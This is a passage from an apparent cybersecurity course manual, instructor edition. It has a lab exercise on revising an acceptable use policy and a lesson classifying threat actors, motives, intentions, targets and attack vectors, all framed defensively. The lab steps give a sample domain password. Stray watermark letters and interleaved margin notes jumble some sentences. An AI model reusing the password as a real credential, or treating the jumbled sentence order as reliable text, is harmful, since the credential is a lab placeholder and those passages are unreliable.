You may choose a
different policy for
students to fill out. Time
or
employees into divulging sensitive information and exposing their workstations and the network to
malicious activity. For example, users have been sending the help desk emails enticing the employees
to click on links to malicious websites. These sites execute scripts on the employees' computers that
e
permitting, have make their systems sluggish and unresponsive. Additionally, some malicious users have been
students fill out multiple contacting help desk employees through their private Facebook and Skype® accounts. The
at
policies. employees have been implicitly trusting anyone with knowledge of these accounts, giving away
Notify students of any sensitive company information over unauthorized communication channels.
changes to activities
lic
based on digital software

You decide to review Develetech's acceptable use policy so that both help desk and regular staff
updates issued by the know what kind of behavior is and is not allowed with regard to communications. Instead of
software vendor. starting from scratch, you'll make minor adjustments to an existing policy that has most of the items
you need already in place.
up
1. View some security policy templates.

D
a) Log on to Windows 10 as DEVELETECH\student## with a password of Pa22w0rd

b) On the desktop taskbar, select the Microsoft Edge icon to open the browser.
ot
Note: You can close any welcome messages that appear.

N
c) Navigate to https://www.sans.org/information-security-policy/.
d) Under the Filters section, check the General check box.
o
D

e) Verify that there are several general security policy templates available.
e
ut
ib
tr
is
D
or
f) Select any of the template options to see more information about the template.
There is a description of the template, as well as links to its PDF or DOC file.
g) Select one or two of the other general security templates that interest you. Change the filter to view
e
templates in other categories.
at
2. Open the acceptable use policy template.

a) Select the File Explorer icon and navigate to C:\CNX0013Data\Assessing Cybersecurity Risk
lic
\LibreOfficePortable.
Note: Consider pinning the C:\CNX0013Data folder to Quick access in File

Explorer. You can do this by right-clicking the folder and selecting Pin to Quick
up
access.
b) Double-click LibreOfficeWriterPortable.exe to open an alternative to Microsoft Word. This policy is available

c) In the Tip of the Day message box, select OK. on the SANS Institute's
D
d) From the menu, select File→Open. website, but is included

with the data files for
e) From the course data files, open dtech_aup_v1.docx.
consistency.
ot
N
o
D

f) Verify that the policy document opens.
e
ut
ib
tr
is
D
or
e
3. Review the overview and purpose of the policy and verify that it outlines both
acceptable and unacceptable behavior for all users to protect the organization
at
and its employees.

lic
4. Scroll down to section 4.3 and review the unacceptable use policy items.
5. What are some other acceptable or unacceptable behaviors you can

up
incorporate in a policy like this one?

A: Answers will vary, but you could further assist help desk employees in defending against attacks
by forbidding communication using unauthorized channels like private Facebook and Skype
D
accounts. You can also take a more positive approach by outlining acceptable behavior when it
comes to the content of a help desk request; for example, the information that should be included
in an email request so that it's both useful to the help desk employee and secure at the same
ot
time. Likewise, you can encourage or mandate email encryption to provide some measure of
authentication and confidentiality in all such requests.
N
6. Add an unacceptable behavior example you've seen from Develetech's help

desk staff.
If you prefer, have a) Place your cursor at the end of the 4.3.2 item number 7 and press Enter.
o
students add or modify

b) Add a number 8 item with the following text:
the policy items to their
D
liking. 8. Use of unauthorized communication channels to contact help desk staff, including, but not limited
to, private Facebook and Skype accounts.
If necessary, help
students with formatting,
but make sure they don't 7. Add your revision to the revision history.
get bogged down by a) Scroll down to the Revision History section and examine the table.
trying to make the
b) In the second row, in the Date of Change column, type today's date.
document look as
appealing as possible. c) In the Responsible column, type your name.

d) In the Summary of Change column, type Added item 8 to email and communication activities.
e
ut
ib
e) Save the document to the desktop as dtech_aup_v2.docx
f) When prompted to confirm the file format, select Use Word 2007–365 Format.
tr
8. Why is it important to maintain a revision history in policies like this one?
is
A: Answers may vary, but security policies, procedures, and processes are living documents. This
means that, in the event of newly identified threats or vulnerabilities, you can adjust the document
accordingly. Documents that cannot keep up with ever-shifting organizational risk factors are
D
unhelpful to their intended audience. Recording a revision history will ensure there is a trail of
changes and that each change is known in the context of when it was made, and that the
person(s) who made the changes are held accountable.
9. Close all open windows. or

e
at
lic
up
D
ot
N
o
D

Summary
In this lesson, you identified why the risk management process is important, and went through the
process by assessing and mitigating risk across a wide range of factors. You also reinforced your risk
management strategy through documentation. The information you learned in this lesson will give
you a foundation for understanding and applying security in your organization.
Encourage students to
At your workplace or one you're familiar with, what security risks are there, and
e
use the social
networking tools what risks do you envision for the future of the organization?
ut
provided on the CHOICE A: Answers will vary. Depending on the industry, the information they work with, and the business they
Course screen to follow do, students may see risk to an organization's finances, physical assets, intellectual property,
up with their peers after
reputation, legal compliance, and other factors. Depending on how they envision their organization
ib
the course is completed
evolving, students may anticipate new risk, additional risk in the same category, or even less risk.
for further discussion
and resources to support
What sort of documentation do you have in your organization or an organization
tr
continued learning.
you're familiar with to support risk management? What other documentation
should there be?
is
A: Answers will vary. Some students will have policies regarding information storage, network usage,
employee awareness and training, and legal compliance. They may also have individual procedures
D
for security personnel and employees to follow in order to enforce security. If students' organizations
are in a partnership or are looking to develop such a relationship, they should also consider drafting
agreement documentation, like an ISA.
or
Note: Check your CHOICE Course screen for opportunities to interact with your classmates,
peers, and the larger CHOICE online community about the topics covered in this course or
other topics you are interested in. From the Course screen you can also access available
e
resources for a more continuous learning experience.
at
lic
up
D
ot
N
o
D
Lesson 1: Assessing Cybersecurity Risk |

2 Analyzing the Threat
Landscape
e
ut
Lesson Time: 1 hour, 50 minutes
ib
tr
is
Lesson Introduction
D
Now that you have a foundational understanding of the importance of risk management,
you're ready to begin meeting security problems head-on. You need to figure out just what
or
and who it is you're up against as you defend your organization from harm. The threat
landscape is huge, diverse, and most important of all, ever-changing. By analyzing the very
nature of threats to your organization, you can obtain crucial knowledge to aid in the active
defense of your computing and network environments.
e
at
Lesson Objectives
lic

• Compare, contrast, and categorize cybersecurity threats.
up
• Analyze current trends in security and how they affect the organization's security
posture.
D
ot
N
o
D

TOPIC A
Classify Threats
Part of any solid defense is understanding your opposition. As a cybersecurity practitioner, you'll
need to get into the minds of those that threaten your organization. In doing so, you'll start to see
patterns of behavior you can anticipate. You'll subsequently be able to save yourself time, effort, and
e
resources in protecting your assets.
ut
Threat Actors
ib
Threat Actors An attacker is also known as a threat actor. It's important not to think of threat actors as some
Consider demonstrating faceless, monolithic entity; on the contrary, they are as diverse as their targets. Threat actors have
various methods of operation, motivations, and intentions. When you understand who is attacking
tr
real-world examples of
threat actors by using a you, why, and how, it'll be easier for you to implement the correct actions to oppose these threats.
security blog such as Thinking of all attackers as the same will only keep you ignorant, and the more ignorant you are of
is
Krebs on Security. the threat landscape, the greater disservice you do to the security of your organization.
Also keep in mind that these days, most attacks (particularly high-profile attacks) are carried out by
D
groups of people. So, the term "threat actor" can refer to multiple people working in concert instead
of just a single person working alone.
Threat Actor
Insiders
Description
or
To begin with, it can be helpful to categorize threat actors as in the following table.
e
An insider is any attacker who has or had a close business relationship
with their target. Current employees may abuse their access and privileges
at
to steal from their employer or blackmail and harass certain members of

the company. Likewise, disgruntled former employees may use their
knowledge of former employer's computer systems to their advantage
lic
even if they no longer have authorized access.

Either way, insiders, even if they are unskilled, can cause a considerable
amount of damage to the organization because of their unique position of
up
trust. In many cases, insiders are more common culprits and are more
successful than external actors.
Script kiddies
D
Script kiddies are inexperienced, unskilled attackers that use tools and
scripts created by others. The term is primarily derogatory and used to
criticize an attacker as having childish motives with a limited appreciation
ot
of the technical aspect of their attacks.

Because of their inexperience, script kiddies are usually less of a
significant threat than more seasoned and knowledgeable attackers;
N
however, with the right tools, they can still cause a great deal of damage.
This is especially true considering how easy it is to acquire freely available
attack tools from the Internet. Nevertheless, script kiddies are more likely
o
to unknowingly leave behind traces of their attack.

D
Lesson 2: Analyzing the Threat Landscape | Topic A

Threat Actor Description

Recreational hackers Recreational hackers are typically more experienced than script kiddies,
and will often treat cyber attacks as a hobby and therefore do it
consistently. They are not always interested in causing massive amounts
of damage, but will occasionally take more subtle approaches to
demonstrate their skill and aptitude.
Not all recreational hackers are malicious, but those that are can be
formidable foes precisely because they often see cyber attacks as a game
e
or challenge to be bested. However, this also means that they are repeat
ut
offenders, and take progressively greater risks.
Professional hackers Professional hackers are paid by some entity to do a job, and as such, they
are typically more skilled and devoted to their craft than most recreational
ib
hackers or script kiddies.
Like recreational hackers, not all professional hackers are malicious;
tr
indeed, many are employed by organizations to conduct penetration tests
for the purpose of evaluating the organizations' security. The malicious
is
variety, however, are usually paid by competing organizations to attack
their rivals, or by disgruntled individuals who have a grudge against an
D
organization but do not themselves possess the required level of hacking
skill. Professional hackers are a significant threat that should not be taken
lightly.
Cybercriminals
or
Like professional hackers, cybercriminals receive money for a job; but
rather than being paid by a third party, they typically steal money from
their target during the attack itself. Cybercriminals can have varying levels
e
of expertise, but the truly successful ones that evade detection are
technically skilled.
at
The focus of a cybercriminal's attack is usually monetary theft, but they

may also commit crimes such as identity theft, fraud, blackmail, etc.
lic
Many cybercriminals join online cybercrime rings to sell or purchase

stolen goods, accounts, and services within a like-minded community.
Hacktivists "Hacktivist" is a portmanteau of "hacker" and "activist," implying that the
up
threat actor is primarily motivated by social issues. This distinction does

not indicate any particular level of skill, but it does suggest that the
attacker is personally committed to an attack.
D
The hacktivist is often convinced their behavior is ethical and not

malicious, and they are more likely to launch attacks on organizations or
people who they believe violate principles such as freedom of expression
ot
and other human rights.

Hacktivists may be solo or work in groups; the most well-known
N
hacktivist group is Anonymous, a loosely organized network of hackers

and those who support its ideals.
State-sponsored Individual nations, or even groups of nations, may employ hackers in
o
hackers order to conduct a wide range of attacks. The hackers these countries
D
employ are almost always skilled and may even have access to powerful
tools and resources that a typical professional hacker does not. State-
sponsored hackers engage in espionage, sabotage, censorship, and more
—all of which can be aimed at both external and internal targets.

Threat Actor Description

Cyberterrorists Like terrorism itself, cyberterrorism is a controversial term that often
means many different things to many different people. More broadly, it is
characterized as an attack on computer systems for the purposes of
damaging those systems and spreading fear.
Cyberterrorists are often motivated by political purposes, and their
techniques may be indistinguishable from hacktivists and state-sponsored
hackers. Like those threat actors, they are usually skilled at hacking.
e
ut
Threat Motives
ib
Threat Motives Each threat actor will have one or more overarching reasons for conducting an attack on your
systems. The different types of actors you encountered in the previous table may be more
predisposed to one type of motive over another, but it can still be difficult to pin down why a
tr
person or group of people are targeting your organization. When you understand how certain
motives influence other dimensions of an attack, you begin to more clearly see why it's an essential
is
piece of information. For example, an attacker who is motivated by revenge may be more emotional
and reckless in their behavior, giving you a greater chance of catching them in a mistake. On the
other hand, a dispassionate attacker simply looking to steal sensitive information may be more
D
predictable based on certain logical patterns.
The following table lists some of the most common threat motives in cybersecurity.
Threat Motive
Desire for money

Description
or
This is the most common motivation for any type of threat actor,
e
especially career cybercriminals. Attackers who desire money will go after
both individuals and organizations in a variety of different ways.
at
Sometimes, the attacker can go through an organization to get to a user's

money, or vice versa. Personal bank accounts and company financial
resources are popular targets because they can immediately provide the
lic
attacker with stolen money.

However, more patient attackers may steal sensitive information and
up
trade secrets to then turn this information around and sell to the highest
bidder. Just because an attack doesn't appear immediately profitable, that
doesn't mean it can't be in the long run.
Attackers who desire financial gain are typically more rational and
D
experienced and are less likely to make mistakes.

Desire for power Some threat actors care less about monetary gains and more about
ot
exercising control over another person or group of people. This is

especially true of cyberterrorists and insiders, who may be taking revenge
if they believe they've been wronged. Others may have no particular ill
N
feelings toward their targets, but simply crave taking control of a

business's assets or person's identity.
o
Attackers may damage computer systems simply to demonstrate that they

have the power to do so; but just as often an attacker will take over a
D
perfectly functioning system to use to their own ends, or they may

transfer data to their custody and destroy the data elsewhere. This can
often lead to extortion attempts as the attacker holds the data for ransom.
Attackers with this motivation are often reckless.

Threat Motive Description

Reputation/recognition Instead of desiring direct control, some attackers will seek to gain a
reputation among a group of people. This is especially true among
recreational hackers who want to prove themselves to hacking
communities. They seek to overcome the script kiddie label and be
recognized as truly skilled hackers. They'll often target increasingly larger
and harder targets to impress others, without necessarily caring about
financial gain or holding control over an organization.
e
Some aren't seeking acceptance in a particular community, but simply
ut
want to be seen as a dangerous or interesting person by anyone and
everyone. Like those that desire power, attackers motivated by reputation
may act carelessly and with little regard to discretion.
ib
Association/affiliation Similar to those that seek recognition, an attacker may also seek inclusion
in a group simply to be part of something greater than themselves. This is
tr
often the case when it comes to hacktivists, cyberterrorists, and state-
sponsored hackers—essentially, anyone with an overriding political or
is
social cause. The attacker identifies very closely with the ideals of the
community they've allied with, and may see themselves as merely an
extension of those ideals.
D
Despite being motivated for less selfish reasons, this type of attacker may
still exhibit behavior that is more emotional than logical. At the same
attention to themselves.
or
time, this affiliation enables them to be more anonymous and draw less
Fun/thrill/exploration Rather than any particularly dramatic reason, some people simply attack
e
systems because it's fun to them. This may be based on some sort of
perceived challenge, or it could be a way for them to develop their skills
at
as a hacker. Another possibility is that they're new to the world of

cybersecurity altogether, and simply want to try what they've been hearing
so much about.
lic
Attackers with this motivation are therefore usually less dangerous than
the others, and they may not even be malicious at all. Nevertheless, they
can still inadvertently cause harm to the organization, and you should
up
treat them seriously as threat actors.

Revenge Some attackers simply want to right a perceived wrong done to them.
D
They feel slighted by something they believe an individual or organization

has done, and may be motivated to take malicious action. Everyone from
existing cybercriminals to insiders and script kiddies can be motivated by
ot
revenge—there is not necessarily one skill level that is common to

revenge attacks.
Attackers motivated by revenge exhibit behavior that is almost purely
N
emotional. On one hand, this could prompt the threat actor to be more
destructive than someone motivated by other reasons; on the other hand,
the threat actor is likely to be reckless and may make significant mistakes
o
that could lead to their downfall.

D
Human Error
Although not a motive per se, human error can still be the reason for an attack. In some cases, a
threat actor may become a threat actor purely by accident. An end user may click the wrong link and
open their workstation up to malicious software; a system administrator may execute the wrong
command during a standard recovery test and may end up taking down more systems than they

should have; a network administrator may configure a wireless access point (WAP) improperly,
inviting unauthorized users to connect to the network; and so on.
Threat Intentions
Threat Intentions Just as the motivations of threat actors differ, so too do their ultimate goals. Knowing exactly what
Consider mentioning an attacker is after can help you decide who and what to protect. It can also help you recognize
that motives and intents attack patterns that you can use to anticipate and mitigate the effects of an attack. Intentions are
often align, though this is almost always an extension of motives; if you know why someone is prepared to attack you, you will
e
not always the case. For have an easier time identifying what they'll actually do. Analyzing both in the same context can
example, someone
ut
provide you with valuable insight into the minds of the threat actors that target your organization.
might intend to steal
from an organization and The following table lists some of the most common intentions of threat actors.
have a primary motive of
ib
revenge, not necessarily Threat Intention Description
a desire for money.
Theft Theft is the most common goal for threat actors that desire money. In the
tr
world of computers, the most lucrative item is information. Thieves look
to steal credit card and financial information, personally identifiable
is
information (PII), or any piece of data that may enrich the attacker while
robbing the victim of money, credibility, market position, and many other
D
necessary components of business.
Thieves may be more inclined to target high-profile information, like your
customers' private data, or they may prefer more subtle targets that are
or
less likely to call attention to themselves. In either case, theft is the most
popular and often the most devastating goal of a cyber attacker. A
business that has its bottom line compromised may not be able to
recover.
e
Espionage Espionage tends to come in two types: state sponsored and industrial.
at
The former is typically carried out by hackers that are in the employ of a
government, and their targets can range from internal (its own citizens) to
lic
external (foreign governments and their citizens). The latter is initiated by

an organization and targets other organizations in the same industry
(typically competitors).
up
A trade secret, like the technical details of a developing product, can cost
an organization time and money if a competitor is able to capitalize on
this information and beat them to the market. Likewise, a nation that
spies on another may be able to glean its military or economic plans,
D
making them easier to prepare for and counteract.

Defamation of Defamation of character is commonly a tactic of those looking for
ot
character revenge; they may attempt to expose their targets as incompetent or

immoral. However, a threat actor may defame an organization or an
individual not out of spite, but simply as a form of sabotage. The attacker
N
will spread information that may either be true or false that the
organization or individual doesn't want public, which could cost the
organization its reputation or the individual their job.
o
Either of these scenarios will weaken the target and may provide an
D
opportunity on which the attacker can capitalize. For example, someone

looking for a promotion in their department may impersonate a fellow
employee also up for the same promotion. During this impersonation,
they may represent the victim negatively, and the manager may react by
denying the victim their promotion, giving it to the attacker instead.

Threat Intention Description

Blackmail/extortion As with defamation, blackmail can be a form of revenge, but it isn't
necessarily. Threatening to release embarrassing or compromising
information about an individual or organization can give the attacker a
considerable amount of power over their victims. They might be doing
this for payment, for a job-based reward (like a promotion), or simply
because they find it fun.
Blackmailers typically breach email accounts or other communication
e
media to expose correspondence that might put the victim in a bad light.
ut
Likewise, the attacker can also threaten to release financial records that
indicate impropriety within the organization (such as tax evasion).
Extortion is related to blackmail, but instead of threatening to release
ib
incriminating information, an extortionist attempts to coerce their victim
into doing something favorable for the attacker under the threat of
violence, destruction of property, or some other malicious act. A
tr
common example in the world of cybersecurity is ransomware that
threatens to destroy critical data unless the victim pays the attacker.
is
Hacktivism/political A hacktivist's goal is more often than not to raise awareness of the cause
D
they are fighting for, and similarly, to take part in a kind of vigilante
justice. Because of the Internet's open and unrestricted origins, many
hacktivists target individuals or organizations who they perceive as a
or
detriment to government transparency, freedom of expression, an open
source philosophy, and other ideals of a democratic society. However,
threat actors from different cultures with vastly different beliefs may, by
contrast, attack organizations that do uphold these ideals.
e
Either way, hacktivists most commonly seek to initiate denial of service
at
(DoS) attacks and humiliation of their victims. Hacktivists are also known
to engage in doxing, which is the practice of publishing PII about
individuals online.
lic
Cyberterrorism The line between hacktivism and cyberterrorism is sometimes blurred,

but cyberterrorism is generally the intent of those using violence and
destruction as a mechanism for achieving their political goals, whereas
up
hacktivism is less likely to incorporate this level of harm.

When successful, cyberterrorism therefore has more devastating effects
on a society and its people. Whereas terrorism typically involves the direct
D
loss of life, cyberterrorism can be responsible for the loss of life in an

indirect manner; for example, the disruption of a hospital's
communication systems may make it more difficult for medical personnel
ot
to properly treat their patients.

N
Threat Targets
To achieve their goals, threat actors need to attack specific resources. These resources are often
o
Threat Targets
technical in nature, but can also include human resources. Identifying these resources, how they
D
might be threatened, and who might threaten them, is an important step in the profiling process.
You'll become better prepared to defend these targets and mitigate attacks against them.
The following table lists some of the most common targets of threats.

Threat Target Description
Individuals Threat actors can target individuals for a variety of reasons, depending on
various factors associated with that individual victim. For example,
attackers will often direct phishing attempts at particularly wealthy
individuals to obtain a huge payout—a process called whaling. Even non-
wealthy individuals may be the target of identity theft, in which a threat
actor exploits a victim's credit and other financial information for their
own gain.
e
Monetary gain is not the only reason why an individual may become a
ut
target. A threat actor may take revenge against a specific person for a
perceived wrong. Likewise, some threat actors may target individuals
based on their sociopolitical affiliation.
ib
Corporations Corporations maintain a great deal of assets, and the nature of big
business makes corporations the primary target for threat actors
tr
interested in monetary gain. Nevertheless, a threat actor may wish to
instead tarnish the corporation's brand as part of a hacktivist campaign or
is
sabotage by a competitor. Competitors may also take a more subtle
approach and engage in espionage against other corporations to glean
certain trade secrets.
D
Non-profit associations Unlike corporations, non-profit associations are not commonly targeted
by threat actors looking for money. However, non-profits still need to
or
manage money to keep operations afloat, so a threat actor may still see an
opportunity there. It's more likely a threat actor will target a non-profit
because of sociopolitical reasons, especially since non-profits typically
push for some sort of social cause a threat actor may take exception to.
e
In order to keep operational costs as low as possible, non-profits may be
at
much more lax about security than a profit-motivated corporation is. This
could provide threat actors with a more attractive target, even if the effect
of their attack is smaller in magnitude.
lic
Governments Governments, especially those in first-world nations, are usually the most
daunting targets. They tend to have the most rigorous security standards
up
and are armed with cutting-edge tools, making an intrusion or other

attack a difficult proposition. This can make them a more common target
for recreational attackers looking to enhance their reputation.
D
Governments are also targeted by other governments and state-

sponsored hackers as part of cyberwarfare. They can attempt to steal
national secrets, damage computer infrastructure, and impede national
ot
operations.
Critical infrastructure Critical infrastructure refers to resources that, if damaged or destroyed,
N
would cause significant negative impact to the economy, public health

and safety, or security of a society. Examples include water supplies,
transportation services, and health services.
o
Critical infrastructure is potentially threatened the most by terrorists

looking to cause panic and disrupt major sources of power for a society.
D
It can also become a target for state-sponsored hackers as a component

of cyberwarfare.

Threat Target Description

Systems Just about every system an organization puts in place can become a target.
While you might typically think of workstations and servers as the main
targets of an attack, threat actors may also look to exploit less traditional
computing systems. Some of these systems include:
• Mobile devices, which are very common in the workforce and are less
likely to be properly secured and managed.
• Internet of Things (IoT) devices, which are often insecure by design
e
and can enable a threat actor to exploit an individual's privacy or an
ut
organization's data.
• Programmable logic controllers (PLCs), which are the components
that directly control industrial control systems (ICSs), often as part of
ib
a supervisory control and data acquisition (SCADA) system.
tr
Attack Vectors
is
An attack vector is the method that an attack takes. In other words, the attack itself is executed Attack Vectors
along a certain path—that path is the vector. Different vectors may enable different outcomes in the
D
attack. Likewise, different motivations and goals may prompt an attacker to take different vectors.
One vector may be more desirable to an attacker because it is less secure, whereas others may be
more well-defended by the organization, and thus less attractive to attackers. Understanding the
or
vectors that attackers take is a crucial step in cybersecurity because it helps the practitioner identify
the how of an attack. When you analyze how attacks are possible within the context of your
organization as well as with external forces, you can more easily stop or prevent incidents entirely.
Although the paths that attackers take are diverse, there are three general elements that can
e
contribute to an attack vector:
at
• Vulnerabilities: Attackers will almost always search for holes within your systems and networks.
Any gaps in security they find are potential vectors of an attack, simply because the attack is
likely to be easier and more successful than if they take a path of greater resistance. Why break
lic
down a wall to get access to a room when the back door is open?
• Exploits: These almost always depend on vulnerabilities to be effective. When the gap in
security is identified, the attacker can launch a tool or utility to take advantage of that gap.
up
Exploits themselves are often programs that carry payloads—the payloads carry the main portion
of the exploit. These payloads can be customized by the attacker to suit their preferences, as well
as to be more effective in a certain context or environment.
D
• Techniques: An attack's technique provides more detail about the path it takes, as well as how it
operates. It can also help categorize the effects of an exploit payload. There may be several
different ways to launch a successful attack on a system or network, but an attacker can choose
ot
one over another for various reasons. The most common reason is efficiency, but escaping
notice is also an important factor.
N
Attack Technique Criteria

o
As mentioned before, attackers can choose different techniques based on factors such as ease, Attack Technique
effectiveness, and concealment. These factors will influence which paths the attacker takes and how Criteria
D
they go about using an exploit. The following are general criteria that cover most attack techniques:
• Targeted vs. non-targeted: Attackers won't necessarily choose specific targets, but may instead
cast a wide net to catch as many potential victims and vulnerabilities as possible. In some
circumstances, this can make an attack more effective, as there are plenty of fallbacks in case one
target doesn't give way to the attack. However, attackers may still prefer the more focused
technique of attacking a single target. They can dedicate all of their time and effort into one

scenario, making it as effective as possible. It's also easier to cover one's tracks when there isn't
much to cover in the first place.
• Direct vs. indirect: To attack targets directly, an attacker usually exploits some technical flaw in
a system or network. They are then able to cause damage or exfiltrate information, whatever
their goal may be, by engaging with the target. Depending on the skill of the attacker and the
state of the target's defenses, this can be relatively quick, easy, and produce instant results.
However, this is not always feasible. Attackers who take an indirect approach do so by being
patient and manipulative. For example, a direct attack on a customer's PII could involve
breaching the network and copying the database the information resides on. In an indirect attack,
e
the attacker could impersonate a customer and socially engineer a customer service
representative into releasing this PII.
ut
• Stealth vs. non-stealth: A huge concern of most attackers is being detected—not just during
the attack itself, but after, when traces of the attack may still remain for a forensics team to
ib
identify. Stealth techniques, like introducing Trojan horse malware that acts as a man-in-the-
middle during network communications, can go undetected for a long time, as they do not
necessarily show overt signs of compromise. As useful as this sounds to an attacker, some avoid
tr
the stealthy route and actually intend to make as much noise as possible. Non-stealth attacks are
often detected easily, but can cause panic and confusion, especially among unseasoned
is
personnel. They can also be used as a form of misdirection—if the security team is tied up
responding to an overt attack, the attacker may find it easier to gain access using other means.
D
• Client-side vs. server-side: This technique criterion is most often enacted when the target is a
website, web app, or some other web-based service. Server-side attacks attempt to compromise
the computer systems that serve data to clients so they end up serving harmful data or no data at
or
all. Successfully compromising a server can have a wide range of effect, as any client that
attempts to connect to that server may be exposed to malicious activity. However, businesses
that run servers, especially large corporations, are much more likely to harden these servers
against attacks, so an attacker may be dissuaded from taking this path. On the other end, average
e
users don't exercise that same high level of security, so their role as a client becomes an attractive
target for attackers. An attack may have much less reach if only one client's browser is
at
compromised, but this could be all the attacker needs to cause a good deal of harm.
Note: These four criteria are not mutually exclusive, and attackers often blend them together
lic
when choosing their techniques.

up
Threat Profiles
Threat Profiles All of the threat components you've seen thus far—actor types, motives, intentions, targets, vectors,
and techniques—can be combined into a single threat profile. Compiling all of these characteristics
D
into a single profile will greatly assist your prevention, mitigation, and response techniques should
the threat actualize. This is because your defense strategies will need to be adjusted based on the
threat's nature—and because there are many dimensions to a threat, being able to describe them
ot
accurately in words will ensure that no crucial information is missing or in the wrong context.
N
o
D

e
ut
ib
tr
Figure 2-1: A basic example of a threat profile.
is
Guidelines for Classifying Threats
D
Guidelines for
Note: All Guidelines for this lesson are available as checklists from the Checklist tile on the Classifying Threats
Follow these guidelines when classifying threats to the organization.
Classify Threats
or
e
When classifying threats:
at
• Recognize the type of threat actors that are out there, as well as their skill level and mental
process.
lic
• Analyze the different motives of attackers and how these motives can affect an attack.
• Identify threat intentions to discover exactly what an attacker is after.
• Identify how certain entities and assets may become the target(s) of a threat.
up
• Understand how vulnerabilities, exploits, and techniques are part of the path that attackers take
to compromise systems and networks.
• Categorize threat techniques into different criteria to study their effect.
• Combine the characteristics of a threat into a complete threat profile.
D
ot
N
o
D

ACTIVITY 2-1
Constructing a Threat Profile
Scenario
e
You're a cybersecurity analyst for Develetech. As part of your job, you evaluate the company's assets
to identify gaps in security that could lead to those assets being compromised. You've been called on
ut
to detail the potential threats to each of the company's major assets. This typically involves
constructing a thorough threat profile so that your colleagues in IT can make more well-informed
ib
decisions in regard to implementing security controls and strategies. At the moment, you've been
asked to create this threat profile based on Develetech's customer records database.
Activity: Constructing a
tr
Threat Profile
Consider leading this 1. Develetech's customer records database contains a variety of information
is
activity as a group
discussion. Students can
about its customers, including first and last name, phone number, physical
work together to address, place of employment, date of birth, and purchase history. Recall that
D
brainstorm ideas and Develetech is a large electronics manufacturer, and it sells products like smart
come to a consensus on
each component of the
TVs, smartwatches, virtual reality head-mounted displays (VR HMDs), 3D
threat profile. Fill in the
slide based on students'
responses.
Consider having
or
printers, and other technology on the rise.
What attack technique criteria do you envision threat actors are most likely to
use in order to compromise this database?
e
students construct two
A: Answers will vary. Depending on the strength of any in-place security controls, an attacker may be
different profiles based
at
inclined to launch a direct attack on the database. This is more likely to net the attacker access to
on the scenario
everything in the database; however, if they are only searching for specific information, they may
questions. At the end of
choose more indirect means. Because the database is likely to already be hardened against
the activity, ask them
lic
attack, attackers would probably opt to choose stealthy methods. This would ensure the attack
which profile they
remains undetected before damage is done, and it may help the attacker cover their tracks
believe is most accurate.
afterward. However, attackers interested more in causing damage and denial of service may forgo
The activity questions stealth to maximize their impact.
up
present the threat

components in reverse
order to get students 2. How could security vulnerabilities and exploitation tools shape the vector a
thinking more deeply threat actor may use to attack the database?
D
about how the

A: Answers will vary. There are several potential vulnerabilities that could open the way for an
components are
attacker. The database itself may be employing weak authentication mechanisms, such as an
connected. This can
easily guessed administrator password. The database may also use poor or obsolete encryption,
ot
help students recognize

making it easy for the attacker to read the data once they've accessed it. Outside the database,
patterns and achieve a
unpatched network authorization mechanisms could give the attacker remote access to the
more robust and useful
database. As far as exploitation tactics, there are many tools available that can capture network
N
threat profile.
authentication packets as well as cause a database to dump its contents. Certain payloads can
Keep in mind that there also be injected into a database to passively monitor new entries or changes.
is not necessarily an
o
objectively right answer

to any of these
D
questions, and that the

answers provided are
only examples.

3. What do you believe are the most likely intentions an attacker has when it
comes to compromising the customer records database?
A: Answers will vary. Theft is probably the most common intention in this case. An attacker who is
able to steal these records can sell them on the black market or to one of Develetech's corporate
competitors. PII can be very useful to individuals and organizations looking to gain an advantage
over the company or its customers. Similarly, an attacker may be directly spying on Develetech on
behalf of one of its competitors to see where its new products are strongest and gain an edge in
the marketplace. More personal or idealistic intentions, such as revenge and activism, are less
likely; however, depending on the company's actions and its relationship with the public, an
e
attacker may seek to humiliate the company by exposing such a crucial asset to the world.
ut
4. What do you believe are the most likely motives an attacker has for
compromising the customer records database?
ib
A: Answers will vary. Assuming theft is the most likely intent, desire for money is the most likely
motive. An attacker can make a great deal of money selling PII. However, there are many other
possible motives: The attacker could have seen all of the recent data breaches in the news and
tr
chosen to make a name for themselves by emulating these breaches; the attacker may destroy
the database rather than copy it, demonstrating they have the power to do so; or the attacker may
is
simply breach the database because they wanted to see if they could, and not necessarily to
exfiltrate any data.
D
5. Using what you've determined for the previous questions, what type of threat
actor do you think is most likely to carry out a compromise of the customer
records database?
or
A: Answers will vary. It's unlikely that a script kiddie would even be able to breach such a high-profile
target. Likewise, there may not be much of a reason why a state-sponsored hacker would go after
an electronics manufacturer. More likely, the threat actor is either an insider or cybercriminal. For
e
the former, the threat actor already has significant access to their target, as well as extensive
knowledge an external user would not possess. This gives them a key advantage and can make
at
their theft or destruction of the database much easier to achieve. A cybercriminal will likely have
the requisite skill to break into the database from the outside, as they have probably made a
career out of stealing personal information.
lic
6. Based on your previous decisions, how would you describe the profile of the
most likely threat(s) to Develetech's customer records database?
up
A: Answers will vary depending on the answers to the previous questions, and you may believe that
multiple profiles are necessary. One example is as follows: The threat actor is likely an insider—
someone with knowledge of the database's structure, physical or logical location, and even its
D
credentials. The insider's motive is most likely a desire for money, as they know this database is
very valuable to identity thieves and corporate competitors. Rather than destroy the database or
deny service to it, the threat's intention is probably to copy the relevant data and exfiltrate it. The
ot
insider may take advantage of the database's poor authentication methods to access it, and may
use a code injection exploit to dump the database. The insider is likely somewhat technically
proficient if they've gotten to this point, so they will probably try a stealthy approach and remove
any traces that they have accessed the database.
N
o
D

TOPIC B
Analyze Trends Affecting Security Posture
Threats don't exist in a vacuum, and neither does cybersecurity as a practice. They evolve and follow
certain trends over time, just like technology and society in general. To stop these changes from
passing you by, you need to constantly stay up to date on the threat landscape and other factors that
e
dynamically affect security.
ut
Ongoing Trend Analysis
ib
Ongoing Trend Analysis To stay up to date on the current threat and vulnerability climate, it's absolutely vital you conduct
ongoing analysis of all areas with the potential to put your business at risk. The more informed you
are, the better equipped you will be to meet your organization's diverse business and operational
tr
needs.
is
An analysis of cybersecurity trends can reveal new flaws or other factors that will have an impact on
your organization's security posture. You can obtain trend data by conducting research into a variety
of resources, including vulnerability databases, security blogs, bug tracking websites, and so on. But
D
before you consult these resources, you should be aware of the best practices that guide good
research:
or
• Seek out industry-accepted and vetted sources for information, including major regulatory and
standards agencies like the National Institute of Standards and Technology (NIST) and ISACA.
• Exercise discretion with unverified sources or untested advice, and beware of social engineering
hoaxes.
e
• Don't settle for one source—corroborate information across several distinct sources.
at
• Conduct research across a spectrum of resources—i.e., don't limit yourself to just reading blogs.
lic
up
D
ot
N
o
D
Lesson 2: Analyzing the Threat Landscape | Topic B

e
ut
ib
tr
is
D
or
